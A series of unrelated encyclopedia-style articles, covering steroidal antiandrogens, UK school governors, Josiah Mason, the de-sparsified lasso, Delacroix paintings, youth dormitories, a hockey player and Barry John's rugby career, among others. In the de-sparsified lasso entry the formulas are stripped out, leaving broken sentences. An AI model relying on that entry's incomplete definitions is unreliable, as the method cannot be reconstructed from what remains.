Benorterone (SKF-7690, FC-612): A pure AR antagonist without progestogenic activity, though with some antigonadotropic activity through an undefined mechanism. One of the earliest antiandrogens. Studied in the treatment of acne, seborrhea, and hirsutism in the 1960s but was found to produce a very high rate of gynecomastia in males. Development was discontinued in favor of cyproterone acetate, which showed only a low rate of gynecomastia in males.
BOMT (Ro 7-2340): A pure AR antagonist without other progestogenic activity, though with some antigonadotropic activity through an undefined mechanism. One of the earliest antiandrogens. Studied in the treatment of benign prostatic hyperplasia but was never marketed. Was also of interest for the potential treatment of acne, pattern hair loss (androgenic alopecia), and prostate cancer, but was never studied for such uses.
Cyproterone (SH-80881, SH-881): A pure AR antagonist without progestogenic activity, showing robust progonadotropic activity like NSAAs. One of the earliest antiandrogens. Was studied in the treatment of precocious puberty as well as acne, seborrhea, and hirsutism. Showed surprisingly poor effectiveness in clinical trials and was abandoned in favor of cyproterone acetate.
Delanterone (GBR-21162): An AR antagonist which was described in the literature in 1977. Was under development for the treatment of acne but showed poor effectiveness in preclinical studies and was abandoned.
Galeterone (TOK-001, VN/124-1): A dual AR antagonist and steroidogenesis inhibitor which was under development for the treatment of prostate cancer but showed insufficient effectiveness in clinical trials and was discontinued.
Inocoterone acetate (RU-38882, RU-882): A steroid-like NSAA. It was under development as a topical medication for the treatment of acne but was discontinued due to insufficient effectiveness in clinical trials.
Metogest (SC-14207): An AR antagonist which was patented in 1975 and briefly investigated for the treatment of acne but was never marketed.
Rosterolone (SH-434): A pure AR antagonist without other hormonal activity. Developed as a topical antiandrogen without systemic activity. Showed some effectiveness in the treatment of acne, but was never marketed.
Topterone (WIN-17665): An AR antagonist which was described in the literature in 1977. Developed as a topical antiandrogen. Was under development for the treatment of acne but showed poor effectiveness and was abandoned.
Trimethyltrienolone (R-2956): An extremely potent AR antagonist without other hormonal activity derived from the powerful anabolic–androgenic steroid metribolone (methyltrienolone). Was under investigation for potential clinical use but development was discontinued in favor of NSAAs, which in contrast show a complete lack of intrinsic androgenic activity.
Zanoterone (WIN-49596): A pure AR antagonist without other hormonal activity except some antiprogestogenic activity in animal models. Was under development for the treatment of benign prostatic hyperplasia but showed poor effectiveness and a high rate of breast pain and gynecomastia in clinical trials and was subsequently abandoned.
Many spirolactone antimineralocorticoids that were never marketed like dicirenone, mespirenone, mexrenone, prorenone, SC-5233 (spirolactone), spirorenone, and spiroxasone also show varying degrees of activity as AR antagonists.
See also
Discovery and development of antiandrogens
List of steroidal antiandrogens
References
Further reading
Anti-acne preparations
Antiandrogens
Antigonadotropins
Hair loss medications
Hair removal
Hormonal antineoplastic drugs
Prostate cancer
Sex hormones
Steroids |
In England, Wales and Northern Ireland, school governors are the overseers of a school. In state schools, they have three main functions:
Giving the school a clear vision, ethos and strategic direction
Holding the headteacher to account for the educational performance of the school and its pupils
Overseeing the financial performance of the school and making sure its money is well spent.
They are the largest volunteer force in the country.
State schools
Composition
In England, Wales and Northern Ireland, every state school has a governing body, consisting of specified numbers of various categories of governors depending on the type and size of school. Governors are unpaid, but they may be reimbursed for expenses for such as the care of dependants or relatives and travel costs. Under section 50 of the Employment Rights Act 1996, employers must give anyone in their employment who serves as a governor reasonable time off their employ to carry out their governor duties. Employers can decide whether this time off is given with or without pay.
Generally, the following categories are applicable:
Parent governors: parents of children at the school;
Staff governors: members of the school staff;
Authority governors (previously known as LEA governors): nominated by the local education authority;
Co-opted governors (previously known as community governors): members of the local community (appointed by the rest of the governing body);
Foundation, partnership and sponsor governors: representatives of any sponsoring bodies.
The proportions vary between differing types of school, but as an example, in community schools, which are usually owned by the LEA, the regulations prescribe that parent governors should be at least one-third of the governors, staff governors at least two places, but no more than one-third, including the headteacher; LEA governors 20% and community governors at least 20%. Church schools will typically include a representative of the church in addition to the above categories. The minimum number of governors is nine, the maximum is twenty (although sponsor governors are additional to these numbers). Governors are appointed for a maximum of four years, this term is renewable.
The headteacher of each school is ex officio a staff governor, but can decline to take up the position. Should they decide not to become a member of the governing body, their place is left vacant.
Staff governors (other than the head teacher) are elected by the school staff and must be paid to work at the school, directly by the school (that is, not under an external contract such as catering or cleaning). At least one staff governor must be a teacher, and if there are three or more staff governors, at least one must be a member of the support staff. If no member of the appropriate category stands for election, the vacant place can be filled by an elected person from the other category (i.e. if no teachers wish to become governors, all staff governors may be support staff, and vice versa).
Parent governors can either be elected by parents of children at the school, or if insufficient numbers are elected, can be appointed by the governing body to fill any remaining vacancies. Such appointees need not be parents of children currently attending the school – if no suitable candidates are found, they may be parents of former pupils, or of any child of school age. Parents so appointed can be removed from their positions by a majority vote of the governing body.
Associate members may be appointed by the governing body as members of committees, and may include pupils, school staff, or anyone else who the governing body feel could contribute to its work. Their voting rights are decided by the governing body, and are also limited by law to exclude matters concerning the budget, admissions, pupil discipline and the election or appointment of governors. Associate members are not governors and are not included in the school's instrument of government.
By law, governing bodies meet at least three times every year, as a full governing body, where the ongoing business of committees, the governing body and the school are discussed, reported on and where decisions are taken by a majority vote. Most of the work of governors, however, is done at committee level.
Chair
The governing body is led by the chair, elected by the governing body from within its membership, though anyone who works at the school cannot stand for the office. Since 1 September 2003, the term of office for the chair can be set to more than one year.
The chair is supported in their work by one or more vice chairs, who may be delegated certain tasks or responsibilities. Certain tasks, including signing-off the school budget, can only be done by the chair. The process for election of chair and vice-chair and their term of office should be laid down in the governing body's standing orders.
The full governing body can remove the chair or any vice chairs by a majority vote of no confidence.
Clerk
The governors are supported in their work by a clerk to the governing body. In many schools this role is combined with that of bursar or administrative officer, although they may also be employed solely in a clerking role. In some areas clerking services may be provided by the local education authority. The clerk is remunerated for their work.
The clerk is usually considered an integral part of the governing body, giving advice whilst not entitled to vote. Their role is primarily one of providing advice and interpretation on the regulatory and administrative framework in which governors work, preparing and distributing minutes and agendas, keeping records and dealing with correspondence.
Responsibilities
The headteacher of the school is responsible for day-to-day management of the school. The role of the governing body is to provide strategic management, and to act as a "critical friend", supporting the work of the headteacher and other staff.
Schools generally have a delegated budget to cover salaries, running costs, maintenance and equipment; the governing body is responsible for managing this budget. They can decide how many and what types of staff to employ, which equipment to upgrade or replace and what the priorities are for implementing new strategies and initiatives.
Governors must appoint the headteacher, and may be involved in the appointment of other staff.
Governors also have a role in monitoring the school's progress, and in setting annual targets for the school's performance and for the headteacher (and ensuring that the headteacher sets targets for other staff).
Governors must review school exclusions in certain circumstances, and have the power to reinstate an excluded pupil or reduce the term of the exclusion (although not to increase it).
Foundation schools, voluntary aided schools and academies act as their own admissions authorities. In such schools, the governing body sets the admissions policy, makes admissions decisions and defends admissions appeals.
Committees
Most governing bodies use a committee structure to undertake their monitoring and evaluation roles. Membership and terms of reference of committees must be determined annually. Finance, staffing, admissions, health and safety, curriculum and premises committees are very common. Other areas covered by committees may include marketing, discipline and management. Many governing bodies form working groups to tackle specific problems.
Since 1 September 2003, particular committees can be given delegated powers to make decisions about the school that do not then require any approval by the full governing body
Training
Governors and clerks can be offered training and support either by the local authority, by central government or by other organisations.
Support organisations
There are a number of organisations, websites and resources that support governors and governing bodies in England and Wales.
The Key for School Governors is a subscription service which provides up-to-the-minute intelligence and resources to support governing boards. In addition to e-learning and online tools like Compliance Tracker, The Key offers free online governor induction in partnership with Governors for Schools and Lloyd's Banking Group.
The National Governors' Association is a representative body for school governors in England. The NGA is an independent charity. Governors can join the NGA as individuals, as members of a governing body, or through their local governors' association.
Governor Wales is the voice of governors of schools in Wales. Governor Wales is funded by the Welsh Government.
Governors for Schools is a government funded charity tasked with recruiting governors for governing bodies in England. Governors for Schools also receives support from business organisations. The Governors for Schools service is free to local education authorities, volunteers, employers and schools. In 2012, Governors for Schools began a partnership with the University of Manchester to ensure local schools have access to skilled governors.
GovernorLine offers free, confidential advice, information and support to school governors, clerks and individuals involved directly in the governance of maintained schools in England. GovernorLine is a free service delivered by an organisation called WorkLife Support, under contract to the UK government.
GovernorNet.co.uk was a UK government website with information for school governors. It was closed by the Department for Education in April 2011, with a recommendation to governors to use the variety of forums that are available including UK Governors and TES Connect.
Independent schools
Private schools, and public schools in particular, generally have governing bodies, although by their very nature, such schools usually decide on their own requirements for their composition.
Research
A study published in 1995 examined whether school governors were bodies of 'active citizens' providing opportunities for democratic participation in the governance of schools, or unpaid volunteers doing the bidding of the state. It also found that the composition and functioning of governing bodies was shaped by the social divisions of class, race and gender.
See also
School board
References
External links
Education in the United Kingdom
Education and training occupations
Governor, school |
Sir Josiah Mason (23 February 1795 – 16 June 1881) was an English industrialist, engaged in pen manufacture and other trades, and a philanthropist. He founded Mason Science College in 1875, which later became the University of Birmingham.
Biography
He was the son of a carpet-weaver, and was born in Mill Street, Kidderminster. He began life as a street hawker of cakes, fruits and vegetables. After trying his hand in his native town at shoemaking, baking, carpentering, blacksmithing, house-painting and carpet-weaving, he moved in 1816 to Birmingham. Here he found employment in the gilt-toy trade. In 1824 he set up on his own account as a manufacturer of split-rings by machinery, to which he subsequently added the making of steel pens. Owing to the circumstance of his pens being marketed through James Perry (founder of Perry & Co., the London stationer whose name they bore, he was less well known than Joseph Gillott and other makers, although he was really the largest producer in England, contributing heavily to the Birmingham pen trade.
In 1874 the business was converted into a limited liability company. Besides his steel-pen trade, Mason carried on for many years the business of electro-plating, copper-smelting, and India-rubber ring making, in conjunction with George Elkington.
Mason was almost entirely self-educated, having taught himself to write when a shoemaker's apprentice, and in later life he felt his deficiencies keenly. It was this which led him in 1860 to establish his great orphanage at Erdington, near Sutton Coldfield, some 6 miles from Birmingham. Upon it he expended about £300,000, and for this munificent endowment he was knighted in 1872. He had previously given a dispensary to his native town and an almshouse to Erdington. In 1880 Mason College, since incorporated in the University of Birmingham, was opened. The total value of the endowment was about £250,000.
In commemoration of him, his bust stands at the centre of the roundabout at the junction of Chester Road & Orphanage Road in Erdington (). This bronze bust was cast in 1951 by William Bloye from a marble statue by Francis John Williamson in 1885, which stood opposite Mason Science College in Edmund Street, but which has since been destroyed. Williamson's statue was erected posthumously, Mason having vetoed its creation during his lifetime. The bust is often "dressed" on special occasions and seasonal holidays.
References
Josiah Mason: A Biography, John Thackray Bunce, 1882
A History of Kidderminster, Rev. John Richard Burton, 1890
Solid Citizens – Statues in Birmingham, Bridget Pugh, 1983,
1795 births
1881 deaths
People from Kidderminster
English philanthropists
People associated with the University of Birmingham
Knights Bachelor
19th-century British philanthropists
19th-century English businesspeople |
De-sparsified lasso contributes to construct confidence intervals and statistical tests for single or low-dimensional components of a large parameter vector in high-dimensional model.
High-dimensional linear model
with design matrix ( vectors ), independent of and unknown regression vector .
The usual method to find the parameter is by Lasso:
The de-sparsified lasso is a method modified from the Lasso estimator which fulfills the Karush–Kuhn–Tucker conditions is as follows:
where is an arbitrary matrix. The matrix is generated using a surrogate inverse covariance matrix.
Generalized linear model
Desparsifying -norm penalized estimators and corresponding theory can also be applied to models with convex loss functions such as generalized linear models.
Consider the following vectors of covariables and univariate responses for
we have a loss function
which is assumed to be strictly convex function in
The -norm regularized estimator is
Similarly, the Lasso for node wise regression with matrix input is defined as follows:
Denote by a matrix which we want to approximately invert using nodewise lasso.
The de-sparsified -norm regularized estimator is as follows:
where denotes the th row of without the diagonal element , and is the sub matrix without the th row and th column.
References
Generalized linear models |
The Combat of the Giaour and Hassan is the title of three works by Eugène Delacroix, produced in 1826, 1835 and 1856. They all show a scene from Lord Byron's 1813 poem The Giaour, with the Giaour ambushing and killing Hassan, the Pasha, before retiring to a monastery. Giaour had fallen in love with Leila, a slave in Hassan's harem, but Hassan had discovered this and had her killed.
1826 version
In 1824, Delacroix recorded in his diary his experience of reading The Giaour and Childe Harold's Pilgrimage, probably in their 1819–1824 French translations by Amédée Pichot. His first version was presented to the Art Institute of Chicago in 1826 for an exhibition.
This version shows the Giaour and Hassan, both on horseback, fighting in a gorge. A Turk escorting Hassan kneels beside the Giaour's horse, trying to cut its legs with his knife.
1835 version
Now in the Petit Palais in Paris, the second version. Unlike the 1825 version, it focuses entirely on the two riders.
1856 version
This work is a variant of the two previous versions
References
Horses in art
Paintings by Eugène Delacroix
Orientalist paintings
Paintings in the Art Institute of Chicago
1826 paintings
1835 paintings
1856 paintings
Paintings in the Petit Palais |
Ethmia praeclara is a moth in the family Depressariidae. It is found in Taiwan, the Philippines, Indonesia, New Guinea and Australia.
References
Moths described in 1910
praeclara |
Singleton's Graveyard is an historic plantation cemetery located off SC 261 in the High Hills of Santee, 6 miles south of Wedgefield, South Carolina. On May 13, 1976, it was added to the National Register of Historic Places.
History
Singleton's Graveyard was the family cemetery for the wealthy and prominent Singleton family descended from Col. Matthew Singleton (1728–1787), who settled in the area in the mid-18th century. It is located on Melrose Plantation built in 1760, one of the family's many plantations. All that remains of Melrose, though, is the graveyard. The 43 known graves date from 1794 to 1944. Many are Singleton family members, including Matthew Singleton himself. The most notable grave marker is that for Governor George McDuffie (1790–1851), husband of Mary Rebecca Singleton, daughter of Col. Richard Singleton. It was designed by noted sculptor Ottaviano Gori of New York City. William Tennant (1740-1777], noted Presbyterian minister and politician, is believed to be buried here, since his widow recorded in their family Bible that he died at "Captain Singleton's High Hills of Santee, August 11, 1777 ...".
Singleton - Van Buren connection
Sarah Angelica Singleton, daughter of Col. Richard Singleton and his wife, Rebecca Travis Coles, married Abraham Van Buren on November 27, 1838, at her parents’ home in Wedgefield. Her father-in-law, Martin Van Buren, was then eighth President of the United States and she served as First Lady during the rest of his time in the White House.
See also
List of Registered Historic Places in South Carolina
References
External links
National Register listings for Sumter County
Transcription of graves in Singleton's Graveyard
Sumter County Museum operated by the Sumter County Historical Society
Matthew Singleton and the Settling of Sumter
South Carolina Department of Archives and History site on Vandalism & Destruction of Cemeteries, contains a picture of Singleton's Graveyard
South Carolina Plantations listing for Melrose Plantation
Pictures of Melrose Plantation
Cemeteries on the National Register of Historic Places in South Carolina
High Hills of Santee
Geography of Sumter County, South Carolina
National Register of Historic Places in Sumter County, South Carolina |
Ethnic youth dormitories are a traditional institution among several ethnic societies of the world including the various ethnic groups of India, the ethnic groups of South-East Asia, and the native Americans.
Among many ethics groups, the youth dormitory is a now declining or defunct institution. For example, among several ethnic groups of Northeast India, the traditional dormitories (called Morung) became dysfunctional in the 20th century, with the advent of modern educational institutions and Christianity. However, among some ethnic groups, such as the Nagas, it has continued to exist as a socio-cultural institution.
Names
Different ethnic groups have different names for their youth dormitories:
Arüju among Aos; the Ao girls slept in a separate house called Tsuki, which was chapreoned by a widow.
Bukumatala in Trobriand Islands
Buonzawl among Hmars
Calpule in Guatemala
Champo among Lothas
Chu or Chupang in the Yangpi village of Nagaland
Dai in Palau
Dekha Chang among Sümis (only for males)
Dhangarbasa or Dhangarbassa among Bhuyans
Dhumkuria among Oraons, including Jonkh-erpa for boys and Pelo-erpa for girls
Ghotul or Gotul among Gonds, common for both males and females
Giti-O or Gitiora among Mundas such as Birhors and Hos; separate for boys and girls
Hangseuki (boys) and Leoseuki (girls) among Zeme
Ikhuichi (boys) and Illoichi (girls) among the Mao Nagas (Memis)
Imieum in New Hebrides
Khangchu / Khangchiu (for boys) and Luchu / Liuchiu / Kailiu (for girls) in Rongmei language
Kichuki among Angamis
Kwod among the tribes of Torres Strait Islands
Lochii among Maos
Loho in Sulawesi
Longshim among Tangkhuls, including Mayarlong for boys and Ngalalong for girls
Louchizii Fii among Poumais
Maro or Terang among Mikirs
Morung (boys) and Yo (girls) among the Konyaks
Moshup or Mosup among Adis / Abors
Nedrong or Nodrong among Dimasa Kacharis
Nokpanti among Garos
Raliiki among Marams
Rang-bang among Bhotiyass, common for both males and females
Rensi, Azughu, or Awikhu among the Rengmas
Roemah Kompani in Kai Islands
Romaluli in Flores
Sochem (boys) and Shemshimang (girls) among the Changs; the Changs also have another morung-like institution called haki, but it is not a bachelor's dormitory. It is used as a guard house, a council hall, a religious institution, a drum house, and a repository for war trophies.
Ti in Marquesas Islands
Zawlbuk among Kukis
In northeast India, Morung is a common name for the traditional youth clubs or bachelors' dormitories. It is an Ahom or Assamese language word.
Functions
Traditionally, after attaining a certain age (as young as 4–5 years among the Oraons), the ethnic youths would attend the dormitory. Generally, they ceased to be a member of the organization when they married. In some cases, as in Ghotul, widowed people were admitted to the dormitory. The dormitories' affairs are usually managed by senior members, including elected office-bearers.
The functions of the youth dormitories vary from group to group, and may include:
Teaching conjugal duties
Teaching social duties
Teaching clan lore
Impart training in tribal art, music and dance
Providing workforce for the community efforts such as shifting cultivation, house-building, elder care, and festival organization
A sleeping place for young tribals in villages that had very small homes without much privacy
Defence of the village (for example, among the Dimasa Kacharis)
Among some ethnic groups, the dormitories also served as a place for courtship among young men and women. These dormitories admitted both men and women. For example, among some Gonds (such as Asurs and Marias) and Khonds, boys and girls sleep in the same dormitory. These functions have changed with times; for example, according to a 1966 survey, the traditional Arju dormitory had largely disappeared from the Ao Naga village of Waromung. In its place, there were two Church-controlled gender-specific dormitories, whose main function was to ensure segregation of unmarried boys and girls. Some tribal dormitories traditionally accept only males, and some have separate dormitories for males and females. For example, among the Mundas, the boys and girls would sleep in separate dormitories at night; in the villages that did not have a dormitory for the girls, the girls would sleep in the house of old women.
Among some of the Nagas, such as the Angamis, the dormitory was an insignificant institution. Among others, it was an important institution and the nominees of the dormitory (morung) served on the village council.
Among some ethnic groups, the dormitories had additional special functions. For example, the Lothas used to keep their sacred stones in the dormitory. The Aos used to hang the heads of their headhunting victims and rewarded the headhunters at the dormitory during the Moatsü festival.
The activities of the dormitories varied from group to group. They included education, story-telling, singing, dancing, sex education, festive celebrations, religious ceremonies, and socio-political activities. The dormitories may train the members in hunting-gathering, fishing, wood-cutting, arts and crafts, agriculture, and other jobs. Among some ethnic groups, the members were expected to help in the village activities such as agriculture and house-building.
The dormitories were generally located near the village chief's house (as among the Oraons), in forest away from the village (as in Bastar district), in the centre of the village, or among the fields (as among the Konyaks). Typically, the dormitories were located in distinctive building structures, and were decorated with totemic emblems.
Some villages had multiple dormitories, such as for each section (khel) of the village among some Naga ethnic groups. The Sümis built miniature dormitories as a fertility rite.
References
Bibliography
House types
Tribes
Indigenous culture |
Slalom is a 1965 Italian comedy film directed by Luciano Salce and starring Vittorio Gassman.
Plot
Lucio and Riccardo, a pair of married pals, take their wives on a ski vacation in Sestriere but get distracted by the beautiful and seductive Nadia and Helen, who lure them into unexpected adventure and danger where Lucio is forced to go to Egypt with another passport and identity.
Cast
Vittorio Gassman as Lucio Ridolfi
Adolfo Celi as Riccardo
Daniela Bianchi as Nadia
Beba Lončar as Helen
Lobna Abdel Aziz as Fahra, Egyptian flight attendant (as Loubna A.Aziz)
Emma Danieli as Hilde, Lucio's wife
Corrado Olmi as Italian Consulat Official
Bob Oliver as George
Nagwa Fouad as Nabila
Isabella Biagini as Simonetta, Riccardo's wife
Piero Vida as The Murderer
References
External links
1965 films
1965 comedy films
1960s Italian-language films
Films directed by Luciano Salce
Commedia all'italiana
Films scored by Ennio Morricone
1960s Italian films |
Glen Seabrooke (born September 11, 1967) is a Canadian former professional ice hockey player who spent parts of three seasons in the National Hockey League (NHL) in the 1980s with the Philadelphia Flyers.
Playing career
As a youth, Seabrooke played in the 1980 Quebec International Pee-Wee Hockey Tournament with a minor ice hockey team from Peterborough, Ontario.
A center recognized for his abilities at both ends of the ice, Seabrooke was Philadelphia's first-round pick (21st overall) in the 1985 NHL Entry Draft. He made his NHL debut in 1986–87 at the age of only 19, scoring a goal and 5 points in 10 games. The following season, he was assigned to the Hershey Bears, Philadelphia's American Hockey League (AHL) affiliate, and notched 32 goals and 78 points in his first full professional season. He also played 6 more games for the Flyers, but was unable to crack a deep squad full-time.
Seabrooke found himself back in the AHL for the 1988–89 season. However, on February 22, 1989 he crashed into a goalpost and severely injured his shoulder. Reconstructive surgery that summer was unable to fix the problem, and Seabrooke's career was over at the age of only 21. He later sued team doctors for improperly rushing his rehab and causing permanent damage to his left arm, and in 1995 he was awarded a settlement of $5.5 million (US) in compensation.
He finished his NHL career with 1 goal and 7 points in just 19 games.
Career statistics
References
External links
1967 births
Living people
Canadian ice hockey centres
Hershey Bears players
Ice hockey people from Peterborough, Ontario
National Hockey League first-round draft picks
Peterborough Petes (ice hockey) players
Philadelphia Flyers draft picks
Philadelphia Flyers players |
University Esports is a collegiate esports partnership headquartered in the offices of GGTech Entertainment in Alicante, Spain.
History
The partnership was founded in February 2020 with the support of American technology company Amazon. It includes collegiate hosts GGTech, the NUEL, and PG Esports, of Spain, the United Kingdom and Italy respectively.
Sponsorship
University Esports sponsors tournaments for League of Legends, Teamfight Tactics and Clash Royale. In the UK, they also sponsor the NUEL's tournaments for Counter-Strike: Global Offensive and Tom Clancy's Rainbow Six Siege.
Intel sponsors University Esports in Turkey; the organization holds events in League Of Legends and Valorant in the region.
References
External links
Official Website
Esports Resources
Amazon (company)
Esports in Spain
Esports in Italy
2020 establishments in Spain
Sports organizations established in 2020
Esports governing bodies
Esports in the United Kingdom |
Brigitta (minor planet designation: 450 Brigitta) is a typical Main belt asteroid. It is a member of the Eos family.
It was discovered by Max Wolf and A. Schwassmann on 10 October 1899 in Heidelberg.
References
External links
Eos asteroids
Brigitta
Brigitta
Brigitta
CSU-type asteroids (Tholen)
18991010 |
Sarıfasıl is a village in the Ulus District, Bartın Province, Turkey. Its population is 169 (2021).
References
Villages in Ulus District |
Barry John (born 6 January 1945) is a former Welsh rugby union fly-half who played, during the amateur era of the sport, in the 1960s, and early 1970s. John began his rugby career as a schoolboy playing for his local team Cefneithin RFC before switching to first-class west Wales team Llanelli RFC in 1964. It was while at Llanelli that John was first selected for the Wales national team, a shock selection as a replacement for David Watkins to face a touring Australian team.
In 1967 John left Llanelli RFC for Cardiff RFC and here he formed a partnership with Gareth Edwards that became one of the most famous half-back pairings in world rugby. From 1967, John and Edwards made an inseparable partnership with rugby selectors, being chosen to play together at all levels of the sport, for Cardiff, Wales, the Barbarians and in 1968 for the British Lions' tour of South Africa. The tour ended prematurely for John when he suffered a broken collarbone in the first Test match against the South African national team.
In 1971 the Wales national team entered what is considered their second 'Golden Age', with a team rich in experience and talent. John was part of the team that won the 1971 Five Nations Championship, the first time Wales had achieved a Grand Slam win since 1952. He then cemented his reputation as one of the sport's greatest players with his pivotal role in the British Lions winning tour over New Zealand in 1971. On the 1971 tour, John played in all four Tests, playing some of his finest rugby and finishing as the Lions' top Test scorer.
John won 25 caps for the Wales national team and five for the British Lions. Possessing excellent balance to his running and along with precision kicking made him one of the great players of the modern era. He retired from rugby at the age of 27, as Wales highest points scorer, citing the pressure of fame and expectation behind his decision.
Rugby career
Early career with Llanelli
Barry John was born in Cefneithin, Carmarthenshire, in Wales. He was educated at Gwendraeth Grammar School in the Gwendraeth Valley, north of Llanelli. He attended Cefenithin Primary, and there he was fortunate to receive skilled rugby teaching. The headmaster, William John Jones, and teacher Ray Williams, were both former Wales international rugby players. Despite his natural talents, he never played at schoolboy level for Wales, but represented both his school and his local village team, Cefneithin RFC. He once played a game for rival team Pontyberem while still a schoolboy, but John recalls in his autobiography that the local resentment at making such a sporting faux pas ensured he never did so again. While still a teenager attending grammar school, he made his first top-flight rugby appearance for Llanelli, on 4 January 1964 in an encounter with Moseley. Although Llanelli lost the encounter, John scored a try and converted it, and played in four more matches for the Llanelli senior team towards the end of the season. He continued to represent Llanelli while at Trinity College, Carmarthen, and gained a reputation as a kicking fly-half with a penchant for putting over dropped goals. During the 1964/65 season, John began to make an impact on the Welsh club scene. His dropped goal against Aberavon on 26 October 1964, only 17 games in, was his 11th of the season.
John gained more attention the following season. A win over Swansea, where he scored two dropped goals, was described by the Llanelli Star as being down to the "genius of one player, Barry John". He almost missed the second away encounter of the season with Swansea when he was 'held to ransom' by his fellow students at Trinity College. He was only released when Llanelli's club chairman, Elvet Jones, promised to make a donation to the college "rag". Llanelli won all four fixtures against Swansea that season, John scoring in all of them. As well as his two dropped goals in the first away fixture, he scored another in the second away game and a try in both the home matches at Stradey Park. In the 1965/66 season John was chosen to play in trial matches for the Wales national team. Although he was not picked, he was chosen as reserve to regular fly-half David Watkins.
During the 1966/67 season John was again chosen to trial for Wales. One of the trials forced him to miss the second Swansea encounter of the season, played away on 12 November 1966; his place in the Llanelli team was given to a youth debutant from the Felinfoel club, Phil Bennett. Bennett became one of the greatest fly-halves produced by Wales, but he was kept from the Wales squad in his early career by the presence of John. In 1966, John was awarded his first international cap for Wales, taking Watkins' place at fly-half for the match against the touring Australia team. This was seen as a surprise move by the Welsh Rugby Union selectors, as Watkins had recently returned from a British Lions tour where he was team captain. Wales lost to Australia 11–4, the first time the Welsh had been beaten by the 'Wallabies', due to poor form in the midfield, with the criticism aimed at John, Gerald Davies and John Dawes. Although experiencing defeat in his first international, John managed to gain revenge over Australia just over a month later when the same team faced Llanelli at Stradey Park. Llanelli beat the Wallabies 11–0 after a bruising forward contest. John himself scored a try, and then added to his tally with a dropped goal.
Despite the Wales loss against Australia, the selectors kept faith with John, and he retained his place for the next Wales international. Played away from home, the opener of the 1967 Five Nations Championship against Scotland had him paired at half-back with Cardiff's Billy Hullin. John played badly while carrying a leg injury, and the next match he was dropped, replaced by the more experienced Watkins.
Joining Cardiff
In the 1967/68 season, John left Llanelli and joined Cardiff, where he formed a partnership with Gareth Edwards. Although John and Edwards later became the scourge of New Zealand, their first international pairing had an inauspicious start. On 11 November 1967, the pair played their first international together, facing Brian Lochore's touring New Zealand team. Edwards, like John, had two international games to his name, paired with Watkins in the final two matches of the 1967 Five Nations Championship. John regained his international place after Watkins had switched to professional rugby league just the month before, joining Salford for a club record fee of £16,000. Wales had an error-strewn game, in a match played in a cutting, rain-laden wind which turned the pitch into a muddy field. Wales captain Norman Gale won the toss and chose to play the first half into the gale, and finished the half 8–0 down. John raised Welsh hopes with an early dropped goal, his first international points, but a panicked blind back pass from Wales' number 8, John Jeffery, gifted Bill Davies an easy try. The game ended 13–6 to New Zealand, with Edwards looking uncomfortable throughout, and John's kicking inaccurate, there was little to suggest the pair would become one of the great half-back pairings in rugby history.
Just over a month after playing for Wales against New Zealand, John faced the tourists again, this time as part of an East Wales team, made up of players from Cardiff, London Welsh and Bridgend. The New Zealand 'All Blacks' were under pressure throughout the match, with John kicking from deep and away from the opposing forwards, allowing his team to make rushes on the 'All Black' defence. After 22 minutes East Wales took the lead when a missed drop goal attempt from John was collected by Cardiff wing Frank Wilson for a try. A defensive lapse from the East Wales team allowed an equalising try, but with the score at 3–3, East Wales dominated the last ten minutes of the match. With the last kick of the match, John had space for one final dropped goal, but his kick sailed inches outside the post. The New Zealanders were glad to escape with the draw and finished the tour without losing a single match. Three days after turning out for East Wales, John and Edwards were paired to face the same New Zealand team, this time played at Twickenham for invitational touring side the Barbarians. The half time result of 3–3 flattered the Barbarians, who were out-played in the forward positions, but the team took the lead early in the second half when a perfect diagonal kick to the corner by John resulted in a try by England's Bob Lloyd. The Barbarians defended strongly for twenty minutes, but lost to two very late tries.
Both John and Edwards were selected for all four matches of the 1968 Five Nations Championship. The first match, away at Twickenham to England, recorded Wales coming from 11–3 down to draw 11 all. Both half-backs were on the score sheet, Edwards with a try, John with one of his trademark dropped goals. After a home win over Scotland, Wales lost to both Ireland and, eventual Championship winners, France. At club level, John finished the season with a total of nine tries and nine dropped goals for Cardiff.
1968 British Lions, the 1969 Triple Crown and Wales tour
John was selected for the British Lions in their tour of South Africa in 1968, but played in just four games before an injury forced him to return home. He played in three matches against district teams, Western Province, South Western Districts and , all wins for the tourists. He was then selected for the First Test, played at Johannesburg, against the South Africa national team. John's first Test for the British Lions lasted for only fifteen minutes, when after running for the line he was tackled by Jan Ellis, and John broke his collarbone on landing on the hard ground.
John played infrequently for Cardiff during the 1968/69 season, making just 14 appearances. Despite this he was available for all matches in the 1969 Five Nations Championship, again playing in each match paired with Edwards. The Welsh selectors had dropped five players from the previous Championship, and notable debutants in the team to face Scotland at Murrayfield on 1 February 1969 were J.P.R. Williams and Mervyn Davies. John scored his first international try in the encounter after charging down a kick and dummying his way over. Scotland, who were under enormous pressure from the kick-off, lost 17–3. When Ireland came to the Cardiff Arms Park in March the team was on a seven match unbeaten run, and were looking at taking the Grand Slam after defeating England, France and Scotland. It therefore came as a surprise at the ease with which the Welsh pack dominated. Wales won 24–11, with Dai Morris the stand-out Welsh player, though John also had one of his best matches, keeping pressure on the Irish with long touch kicks and scoring with a dropped goal. Despite out-scoring France in tries scored, the match at Stade Colombes ended in an 8–8 draw, preventing a Welsh Grand Slam, though a win in the last match to England would give Wales the Championship. The England decider is best remembered for Maurice Richards' four tries, but John too was on the scoresheet with a dropped goal and a try of his own. The game finished 30–9 to Wales, giving John his first Championship title and made him a Triple Crown winning player, as Wales had beaten all three other Home Nation teams.
Before the end of the season, John took part in his one and only seven-a-side tournament for Cardiff when he participated in the 1969 Snelling Sevens tournament. Cardiff progressed to the final, where they succeeded in beating John's former club Llanelli. As well as the title, John won the "Bill Everson – Player of the Tournament" award.
With the end of the 1968/69 season, the Welsh Rugby Union sent a team to tour New Zealand and Australia. At half-back, Wales sent John, Edwards, Phil Bennett and Chico Hopkins, but in all three Tests, two against the New Zealand "All Blacks" and one against Australia, Welsh coach Clive Rowlands kept faith with John and Edwards. The Welsh team were completely overwhelmed by the All Blacks, losing both Tests, 0–19 and 12–33. A change of tactics by Rowlands, by switching Gerald Davies to the right wing, gave Wales a victory over Australia, and a six try victory over Fiji (in which John was replaced by Bennett) on their return to Britain, helped the team gain a warm reception on their return.
South Africa, the 1970 Championship and the 1971 Grand Slam
